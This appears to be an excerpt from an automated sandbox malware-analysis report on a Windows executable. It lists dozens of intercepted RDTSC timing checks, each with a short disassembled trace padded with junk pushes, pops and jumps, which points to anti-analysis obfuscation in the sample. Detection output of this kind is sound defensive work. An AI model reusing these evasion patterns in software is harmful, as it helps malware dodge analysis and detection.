            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4DC0C50 second address: 4DC0C85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9084161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+0Ch] 0x0000000e pushad 0x0000000f mov cl, 45h 0x00000011 mov eax, edx 0x00000013 popad 0x00000014 push dword ptr [ebp+08h] 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a call 00007FA4C908415Ch 0x0000001f pop ecx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4DC0C85 second address: 4DC0C8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4DC0C8A second address: 4DC0C9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA4C908415Dh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E30520 second address: 4E30526 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E30526 second address: 4E3052C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E3052C second address: 4E30530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E30530 second address: 4E30534 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E30534 second address: 4E30543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E30543 second address: 4E30547 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E30547 second address: 4E3054D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E3054D second address: 4E30553 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E30553 second address: 4E30557 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E30557 second address: 4E305A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9084161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FA4C908415Ch 0x00000013 sbb esi, 20FE1B38h 0x00000019 jmp 00007FA4C908415Bh 0x0000001e popfd 0x0000001f movzx esi, bx 0x00000022 popad 0x00000023 mov ebp, esp 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FA4C908415Eh 0x0000002c rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E305A5 second address: 4E305AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E305AB second address: 4E305AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E305AF second address: 4E305DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C902634Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f call 00007FA4C9026353h 0x00000014 pop ecx 0x00000015 mov ax, dx 0x00000018 popad 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E00BD5 second address: 4E00C07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA4C908415Eh 0x00000009 adc si, 36B8h 0x0000000e jmp 00007FA4C908415Bh 0x00000013 popfd 0x00000014 mov ax, EEEFh 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E00C07 second address: 4E00C0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E00C0B second address: 4E00C22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9084163h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E00C22 second address: 4E00CA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FA4C902634Fh 0x00000008 pop ecx 0x00000009 pushfd 0x0000000a jmp 00007FA4C9026359h 0x0000000f sbb ah, 00000066h 0x00000012 jmp 00007FA4C9026351h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 pushfd 0x00000022 jmp 00007FA4C9026359h 0x00000027 or esi, 13F11D76h 0x0000002d jmp 00007FA4C9026351h 0x00000032 popfd 0x00000033 popad 0x00000034 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E00CA0 second address: 4E00CB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA4C908415Ch 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E00CB0 second address: 4E00CB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E50539 second address: 4E5053D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E5053D second address: 4E50543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E50543 second address: 4E5058F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C908415Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov ecx, 6E3B808Dh 0x00000011 pushfd 0x00000012 jmp 00007FA4C908415Ah 0x00000017 sub ax, C8A8h 0x0000001c jmp 00007FA4C908415Bh 0x00000021 popfd 0x00000022 popad 0x00000023 pop ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FA4C9084160h 0x0000002d rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E5058F second address: 4E50595 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E30DEA second address: 4E30E5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA4C9084167h 0x00000009 jmp 00007FA4C9084163h 0x0000000e popfd 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 jmp 00007FA4C908415Fh 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FA4C908415Bh 0x00000024 adc ecx, 57DFC54Eh 0x0000002a jmp 00007FA4C9084169h 0x0000002f popfd 0x00000030 popad 0x00000031 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E30E5F second address: 4E30E87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FA4C9026359h 0x00000008 pop eax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E30E87 second address: 4E30E8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E30E8B second address: 4E30E91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E30E91 second address: 4E30EA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C908415Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a pushad 0x0000000b mov al, 4Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop esi 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4DD0255 second address: 4DD029C instructions: 0x00000000 rdtsc 0x00000002 mov edx, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FA4C902634Ah 0x0000000c sub eax, 54D65848h 0x00000012 jmp 00007FA4C902634Bh 0x00000017 popfd 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a jmp 00007FA4C9026356h 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov bx, cx 0x00000026 mov cx, 3D9Fh 0x0000002a popad 0x0000002b rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4DD029C second address: 4DD02BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 mov eax, 31F56033h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FA4C9084160h 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4DD02BF second address: 4DD02C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E30622 second address: 4E30628 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E30628 second address: 4E30637 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA4C902634Bh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E30637 second address: 4E30689 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9084169h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e jmp 00007FA4C908415Eh 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007FA4C908415Dh 0x0000001e jmp 00007FA4C908415Bh 0x00000023 popfd 0x00000024 mov dh, ch 0x00000026 popad 0x00000027 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E30689 second address: 4E3068F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E30BD0 second address: 4E30BD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E30BD4 second address: 4E30BD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E30BD8 second address: 4E30BDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E00AF6 second address: 4E00B5C instructions: 0x00000000 rdtsc 0x00000002 mov cx, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FA4C9026359h 0x00000010 or eax, 4BEE9116h 0x00000016 jmp 00007FA4C9026351h 0x0000001b popfd 0x0000001c call 00007FA4C9026350h 0x00000021 pop edx 0x00000022 popad 0x00000023 mov ebp, esp 0x00000025 pushad 0x00000026 mov ch, 41h 0x00000028 mov ch, bl 0x0000002a popad 0x0000002b pop ebp 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FA4C902634Dh 0x00000033 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E00B5C second address: 4E00B62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E00B62 second address: 4E00B66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E00B66 second address: 4E00B6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E30F0B second address: 4E30F31 instructions: 0x00000000 rdtsc 0x00000002 mov bh, al 0x00000004 pop edx 0x00000005 pop eax 0x00000006 movsx ebx, cx 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA4C9026359h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E30F31 second address: 4E30F36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E30F36 second address: 4E30F3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E30F3C second address: 4E30F7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FA4C9084160h 0x00000010 or ecx, 6525E8D8h 0x00000016 jmp 00007FA4C908415Bh 0x0000001b popfd 0x0000001c popad 0x0000001d movzx ecx, bx 0x00000020 popad 0x00000021 xchg eax, ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FA4C908415Eh 0x00000029 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4DE0A6A second address: 4DE0A70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E40BB9 second address: 4E40BBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E40BBD second address: 4E40BC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E40BC1 second address: 4E40BC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E40BC7 second address: 4E40BCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E40BCD second address: 4E40BD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E40BD1 second address: 4E40C2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C902634Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FA4C9026350h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov cl, 50h 0x00000017 pushfd 0x00000018 jmp 00007FA4C9026359h 0x0000001d adc ax, 6BE6h 0x00000022 jmp 00007FA4C9026351h 0x00000027 popfd 0x00000028 popad 0x00000029 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E40C2C second address: 4E40C32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E40C32 second address: 4E40C81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9026353h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov cl, F9h 0x0000000f pushfd 0x00000010 jmp 00007FA4C9026351h 0x00000015 xor cx, 6EA6h 0x0000001a jmp 00007FA4C9026351h 0x0000001f popfd 0x00000020 popad 0x00000021 mov ebp, esp 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E40C81 second address: 4E40C85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E40C85 second address: 4E40C8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E40C8B second address: 4E40D40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9084162h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b pushad 0x0000000c call 00007FA4C908415Ch 0x00000011 pop ecx 0x00000012 mov eax, edi 0x00000014 popad 0x00000015 mov al, bh 0x00000017 popad 0x00000018 push eax 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FA4C908415Fh 0x00000020 and ax, BBEEh 0x00000025 jmp 00007FA4C9084169h 0x0000002a popfd 0x0000002b mov ebx, esi 0x0000002d popad 0x0000002e xchg eax, ecx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007FA4C908415Fh 0x00000038 xor al, FFFFFFFEh 0x0000003b jmp 00007FA4C9084169h 0x00000040 popfd 0x00000041 pushfd 0x00000042 jmp 00007FA4C9084160h 0x00000047 sbb ecx, 1F9128F8h 0x0000004d jmp 00007FA4C908415Bh 0x00000052 popfd 0x00000053 popad 0x00000054 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E40D40 second address: 4E40D58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA4C9026354h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E40D58 second address: 4E40D85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C908415Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [775165FCh] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FA4C9084165h 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E40D85 second address: 4E40DB6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9026351h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FA4C9026356h 0x00000013 popad 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E40DB6 second address: 4E40DD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C908415Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FA53B6D6CF7h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E40DD1 second address: 4E40DEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9026357h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E40DEC second address: 4E40E0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FA4C908415Fh 0x00000008 pop ecx 0x00000009 push edx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ecx, eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E40E0B second address: 4E40E13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx esi, dx 0x00000007 popad 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E40E13 second address: 4E40E83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 26FAA311h 0x00000008 movzx eax, dx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xor eax, dword ptr [ebp+08h] 0x00000011 jmp 00007FA4C9084166h 0x00000016 and ecx, 1Fh 0x00000019 jmp 00007FA4C9084160h 0x0000001e ror eax, cl 0x00000020 jmp 00007FA4C9084160h 0x00000025 leave 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007FA4C908415Dh 0x0000002f jmp 00007FA4C908415Bh 0x00000034 popfd 0x00000035 mov eax, 5F98C01Fh 0x0000003a popad 0x0000003b rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E401F4 second address: 4E401F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E401F8 second address: 4E401FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E401FE second address: 4E40204 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E40204 second address: 4E40208 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E40208 second address: 4E40244 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C902634Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov al, 97h 0x0000000f movsx ebx, si 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 jmp 00007FA4C9026358h 0x0000001a mov eax, dword ptr [ebp+08h] 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E40244 second address: 4E40248 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E40248 second address: 4E4024E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E00040 second address: 4E00046 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
